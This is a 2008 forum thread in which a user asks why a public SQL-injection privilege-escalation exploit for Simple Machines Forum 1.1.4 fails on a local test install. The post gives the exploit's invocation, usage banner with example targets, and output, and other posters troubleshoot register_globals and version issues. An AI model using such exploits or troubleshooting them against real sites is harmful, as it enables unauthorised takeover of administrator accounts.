Need help using an exploit

Discussion in 'Sandbox' started by Rashid, 26 Oct 2008.

  1. Rashid

    Rashid Elder

    Joined:
    31 Jan 2008
    Messages:
    46
    Likes Received:
    4
    Reputations:
    2
    Exploit: http://www.milw0rm.com/exploits/5826
    I run it:
    # python ./smf.py localhost /smf/ i3sdq9d8v1pe4fr20r6qjnqcs5 2

    #=================================================================#
    # Simple Machines Forum <= 1.1.4 #
    # Sql Injection Vulnerability #
    # Priviledge Escalation Exploit #
    # #
    # ###################################### #
    # # Let's get administrator rights!!! # #
    # ###################################### #
    # #
    # Discovered By The:paradox #
    # #
    # Usage: #
    # ./Exploit [Target] [Path] [PHPSessID] [Userid] #
    # #
    # Example: #
    # ./Exploit 127.0.0.1 /SMF/ a574bfe34d95074dea69c00e38851722 9 #
    # ./Exploit www.host.com / 11efb3b6031bc79a8dd7526750c42119 36 #
    #=================================================================#

    [.] Exploit Starts.
    [+] Trying to read Sesc
    [+] Sesc has been successfully read ==> 891439426d210d5c6e1d50cd68b54f0c
    [+] Creating three labels...
    [+] Sql code is going to be injected.
    [+] All done.
    Now user with ID_MEMBER 2 should have administrator rights.
    -= Paradox Got This One =-

    As far as I understand, the user with id=2 should get administrator rights, but that doesn't happen.
    What am I doing wrong???
     
  2. swt1

    swt1 Elder

    Joined:
    16 Feb 2008
    Messages:
    306
    Likes Received:
    78
    Reputations:
    21
    Before using it you have to have admin rights, then use the exploit. Is register_globals on?)
     
    #2 swt1, 26 Oct 2008
    Last edited: 26 Oct 2008
  3. Rashid

    Rashid Elder

    register_globals is enabled.
    Then what is the point of such an exploit? Having admin rights in order to get admin rights?
     
  4. swt1

    swt1 Elder

    Right, I overlooked that)) Then register_globals is turned off on the server, or a newer version is installed.
     
  5. Rashid

    Rashid Elder

    I am testing on localhost, the version is 1.1.4, and register_globals is enabled.
     
  6. Sleep

    Sleep Elder

    Joined:
    31 Oct 2007
    Messages:
    271
    Likes Received:
    65
    Reputations:
    4
    How are you running it???
     
  7. Rashid

    Rashid Elder

    python ./smf.py localhost /smf/ i3sdq9d8v1pe4fr20r6qjnqcs5 2